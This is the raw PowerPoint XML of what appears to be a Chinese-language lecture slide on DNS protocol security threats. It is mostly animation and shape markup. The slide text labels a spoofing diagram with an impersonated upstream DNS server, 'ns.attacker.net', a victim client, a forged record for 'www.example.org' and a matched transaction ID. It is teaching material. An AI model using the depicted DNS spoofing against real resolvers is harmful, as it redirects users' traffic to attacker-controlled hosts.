                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50180"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="10" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="50188"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50188"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50188"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50188"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="15" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="50181"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50181"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50181"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50181"/>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50182"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50182"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50182"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50182"/>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183"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50183"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50183"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5018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0191"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50191"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50191"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5019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0185"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50185"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="41" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="42" presetID="54" presetClass="entr" presetSubtype="0" accel="100000" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="50186"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50186"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.05"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50186"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50186"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-.2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50186"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50186"/>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50189"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5018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50184"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50184"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="58" presetID="54" presetClass="entr" presetSubtype="0" accel="100000" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="59" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="50187"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50187"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.05"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50187"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="62" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50187"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-.2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="63" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50187"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="64" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50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bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="50183" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="50184" grpId="0" animBg="1"/>
      <p:bldP spid="50185" grpId="0" animBg="1"/>
      <p:bldP spid="50186" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="50187" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="50189" grpId="0" animBg="1"/>
      <p:bldP spid="50191" grpId="0" bldLvl="0"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伪装远程（上级）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149506" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>域名服务协议安全威胁</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4915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2565400"/>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150" y="2852738"/>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5106988"/>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Box 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2627313" y="6021388"/>
            <a:ext cx="1668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ns.attacker.net</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49160" name="TextBox 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6372225" y="3933825"/>
            <a:ext cx="12176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9161" name="TextBox 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1414463" y="3573463"/>
            <a:ext cx="1211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受害客户端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49162" name="Freeform 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2482850" y="3068638"/>
            <a:ext cx="4149725" cy="685800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 20042629 w 3408218"/>
              <a:gd name="T1" fmla="*/ 5007107 h 498763"/>
              <a:gd name="T2" fmla="*/ 10126060 w 3408218"/>
              <a:gd name="T3" fmla="*/ 7927892 h 498763"/>
              <a:gd name="T4" fmla="*/ 0 w 3408218"/>
              <a:gd name="T5" fmla="*/ 0 h 498763"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 3408218"/>
              <a:gd name="T10" fmla="*/ 0 h 498763"/>
              <a:gd name="T11" fmla="*/ 3408218 w 3408218"/>
              <a:gd name="T12" fmla="*/ 498763 h 498763"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="3408218" h="498763">
                <a:moveTo>
                  <a:pt x="3408218" y="285008"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2849088" y="391885"/>
                  <a:pt x="2289958" y="498763"/>
                  <a:pt x="1721922" y="451262"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1153886" y="403761"/>
                  <a:pt x="0" y="0"/>
                  <a:pt x="0"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163" name="Freeform 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2482850" y="2708275"/>
            <a:ext cx="4125913" cy="593725"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 3313215"/>
              <a:gd name="T1" fmla="*/ 821397 h 455220"/>
              <a:gd name="T2" fmla="*/ 12315215 w 3313215"/>
              <a:gd name="T3" fmla="*/ 691697 h 455220"/>
              <a:gd name="T4" fmla="*/ 23860727 w 3313215"/>
              <a:gd name="T5" fmla="*/ 4971618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164" name="Freeform 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3708400" y="3717925"/>
            <a:ext cx="2951163" cy="1943100"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 3417094 w 2897579"/>
              <a:gd name="T1" fmla="*/ 0 h 1626919"/>
              <a:gd name="T2" fmla="*/ 2058662 w 2897579"/>
              <a:gd name="T3" fmla="*/ 5343790 h 1626919"/>
              <a:gd name="T4" fmla="*/ 0 w 2897579"/>
              <a:gd name="T5" fmla="*/ 8045048 h 1626919"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 2897579"/>
              <a:gd name="T10" fmla="*/ 0 h 1626919"/>
              <a:gd name="T11" fmla="*/ 2897579 w 2897579"/>
              <a:gd name="T12" fmla="*/ 1626919 h 1626919"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="2897579" h="1626919">
                <a:moveTo>
                  <a:pt x="2897579" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2563091" y="404750"/>
                  <a:pt x="2228603" y="809501"/>
                  <a:pt x="1745673" y="1080654"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1262743" y="1351807"/>
                  <a:pt x="0" y="1626919"/>
                  <a:pt x="0" y="1626919"/>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165" name="Freeform 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3708400" y="3648075"/>
            <a:ext cx="2900363" cy="1509713"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2541319"/>
              <a:gd name="T1" fmla="*/ 5169805 h 1294410"/>
              <a:gd name="T2" fmla="*/ 3393938 w 2541319"/>
              <a:gd name="T3" fmla="*/ 2324044 h 1294410"/>
              <a:gd name="T4" fmla="*/ 8348303 w 2541319"/>
              <a:gd name="T5" fmla="*/ 0 h 1294410"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 2541319"/>
              <a:gd name="T10" fmla="*/ 0 h 1294410"/>
              <a:gd name="T11" fmla="*/ 2541319 w 2541319"/>
              <a:gd name="T12" fmla="*/ 1294410 h 1294410"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="2541319" h="1294410">
                <a:moveTo>
                  <a:pt x="0" y="1294410"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="304800" y="1046018"/>
                  <a:pt x="609600" y="797626"/>
                  <a:pt x="1033153" y="581891"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1456706" y="366156"/>
                  <a:pt x="1999012" y="183078"/>
                  <a:pt x="2541319"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9166" name="TextBox 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3851275" y="2492375"/>
            <a:ext cx="2520950"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
        <p:nvSpPr>
          <p:cNvPr id="49167" name="TextBox 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4500563" y="4868863"/>
            <a:ext cx="2519362" cy="58578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www.example.org?</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ID=36</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49168" name="TextBox 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2124075" y="4213225"/>
            <a:ext cx="3455988"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③ www.example.org=1.1.1.1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黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>和一些其他被篡改的记录，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ID=36</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49169" name="TextBox 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
